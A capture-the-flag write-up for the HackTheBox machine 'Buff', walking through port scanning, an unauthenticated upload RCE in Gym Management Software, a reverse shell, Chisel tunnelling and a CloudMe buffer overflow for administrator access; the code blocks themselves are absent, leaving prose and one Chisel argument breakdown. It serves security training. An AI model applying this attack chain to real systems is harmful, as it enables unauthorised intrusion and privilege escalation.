🕵 HTB-Writeup : BUFF

Recon
rustscan
Rustscan is a usefull port scanning tools developed in Rust. It is not an alternative to nmap
but a non-negligible improvement. Rustscan can scan all 65k port fastly then, pipe open port on a nmap scans.
This allows to speed up the discovery of open ports and to run nmap scan (with scripts) only on open ports.
|
|
dirbuster
Running a dirbuster
we found a lot of files and directories.

Searching vulnerabilities
Trying SQLi
I’ve tried to run an SQLi on the main page, on the login form parameters (email=
& password=
).
|
|
It failed. There is no vulnerable parameters.
Then, I tried on the feedback.php
page.
|
|
Again, the feed
parameter does not seem to be vulnerable.
I tried several other pages but I could not find any SQLi. I think it’s not the entrypoint.
Gym Management Software
On the contact.php
page, we found that this website was made using Gym Management Software v1.0

Searching vulnerabilities for this software with searchsploit
, we found 4 vulnerabilities.
|
|
I first tried to exploit the Unauthenticated Remote Code Execution vulnerability.
This exploit use a vulnerability on the gym management system, the upload.php
page does not check if the user is authenticated. Thanks to that, we are able to upload files. We can upload a php file with a double extension and a magic bytes at the beginning to bypass the whitelist and the file type check.
|
|
It works! We can get the user flag!
|
|
Get clean shell
But the shell given by this exploit is not very good. We can’t change directory and we are not able to see errors. I manage to get a clean persistent and interactive shell.
To do so, I upload, thanks to a smb share, netcat on the target, then pop a powershell reverse shell.
|
|
We have now a clean shell.
Path to the privesc
Local recon
I first search for any vulnerable privileges enabled. Our user has no interesting privileges that could be exploited.
Then, I look for all network connection with the netstat
command. I filter first by TCP port.
|
|
I found two connections that are listening one the localhost address. One is linked to a mysql server that is probably linked to the xampp server.
The other is the CloudMe.exe, a file storage service.
Search for any vulnerabilities
Using searchsploit we are able to find some vulnerabilities for the CloudMe service.
|
|
We found an exploit (a buffer overflow) using python, but sadly the target don’t have any python version installed. This script can only be run in local, so for the moment, I don’t have any solution.
Tunneling
From now, the term victim refer to the Box and attacker refer to my computer
After some research, I found that it is possible to use a tunnel. A tunnel can be used to forward traffic between host and a target. This will allow to execute our exploit locally (on my machine) and forward all traffic to the Box.
To do so, I managed to use Chisel “A fast TCP/UDP tunnel, transported over HTTP, secured via SSH”.
First, we start a chisel server on the attacker that will be listening on port 8000.
|
|
On the victim, we upload chisel binary and execute it in client mode. We follow this pattern to build our command: <local-host>:<local-port>:<remote-host>:<remote-port>
|
|
Explaining arguments:
- 10.10.16.6:8000 : attacker IP and the chisel server port
- R:8888:localhost:8888 :
- R : indicate that we want to listen on the remote host (attacker)
- 8888 : open a listener on port 8888 of the attacker
- localhost : all traffic are forwarded to localhost… (victim)
- 8888 : … on port 8888 of the victim
This command will create a tunnel. This tunnel allows us to forward all traffic sending to port 8888 of attacker (my computer) to port 8888 of the victim.

On the attacker, we confirm that the tunnel is well established. Moreover, it can be verified with a netstat
on the attacker.
|
|
The tunnel is well established. We are now listening on port 8888 and all traffic on that port will be forward on the victim.
Creating the exploit
Now that our tunnel is created, we can now use our python exploit locally while redirecting traffic to the box.
We take the python exploit that we found on exploitdb.
|
|
The exploit use a simple buffer overflow on the CloudMe service allowing us to execute commands with administrator privileges. By default, the script’s payload allows us to invoke the calc.exe
process.
We will generate our payload with msfvenom
using the same pattern as the exploit but using a reverse shell payload.
|
|
The -v payload
switch allows us to get the output in payload format, allowing us to copy/paste it directly in our script, replacing the old one.
We start a netcat
to listen on the port configured in our payload and we execute the exploit.
|
|
We get an administrator shell ! We can now retrieve the root flag :)
Tags
Easy, External, Apache, Python, Penetration Tester Level 2, Buffer Overflow, A04:2021-Insecure Design, Reversing, PHP, Remote Code Execution, A06:2021-Vulnerable And Outdated Components